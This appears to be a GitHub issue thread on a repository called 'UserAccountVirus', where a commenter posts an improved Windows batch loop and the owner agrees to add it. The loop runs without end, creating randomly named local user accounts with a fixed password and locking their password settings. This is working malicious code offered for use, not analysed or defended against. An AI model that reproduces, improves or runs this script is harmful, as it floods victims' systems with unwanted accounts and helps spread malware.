### ISSUE TITLE
i can do better your batch

### ISSUE THREAD

**Issue by Mrgaton** [ArianFarrokhi/UserAccountVirus#1]
please contact me on discord

**Comment by Mrgaton** [comment]
Que Onda#1018

**Comment by Mrgaton** [comment]
Just 


`:user_spammer
set "NewUser=Muby-V(%random%%random%)"
net user "%NewUser%" "MubyV-XD" /add
WMIC USERACCOUNT WHERE "Name='%NewUser%'" SET PasswordExpires=FALSE
WMIC USERACCOUNT WHERE "Name='%NewUser%'" SET Passwordchangeable=FALSE
goto user_spammer`

and it just infinite

**Comment by Mrgaton** [comment]
This is better 

:user_spammer
set "NewUser=Muby-V(%random%%random%)"
net user "%NewUser%" "MubyV-XD" /add
WMIC USERACCOUNT WHERE "Name='%NewUser%'" SET PasswordExpires=FALSE
WMIC USERACCOUNT WHERE "Name='%NewUser%'" SET Passwordchangeable=FALSE
goto user_spammer

**Comment by InfSpect** [comment]
Yep its better thanks! ill add it :)
